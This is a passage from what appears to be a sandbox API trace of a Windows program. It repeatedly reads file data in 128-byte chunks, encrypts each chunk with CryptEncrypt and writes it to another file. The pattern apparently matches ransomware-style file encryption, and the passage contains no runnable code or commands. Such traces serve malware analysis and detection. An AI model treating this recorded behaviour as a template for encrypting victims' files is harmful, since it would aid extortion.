pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.935] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.936] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.936] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.936] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.936] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.936] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.936] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.936] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.936] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.936] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.936] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.936] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.936] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.936] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.936] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.936] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.936] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.936] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.936] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.937] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.937] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.937] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.937] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.937] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.937] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.937] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.937] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.937] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.937] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.937] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.937] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.937] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.937] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.937] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.937] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.937] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.938] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.938] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.938] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.938] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.938] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.938] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.938] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.938] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.938] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.938] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.938] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.938] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.938] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.938] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.938] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.938] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.938] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.939] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.939] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.939] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.939] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.939] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.939] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.939] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.939] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.939] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.939] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.939] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.939] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.939] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.939] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.939] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.939] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.939] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.939] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.940] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.940] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.940] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.940] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.940] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.940] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.940] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.940] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.940] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.940] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.940] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.940] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.940] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.940] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.940] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.940] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.940] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.941] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.941] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.941] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.941] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.941] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.941] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.941] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.941] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.941] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.941] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.941] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.941] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.941] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.941] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.941] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.941] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.942] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.942] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, 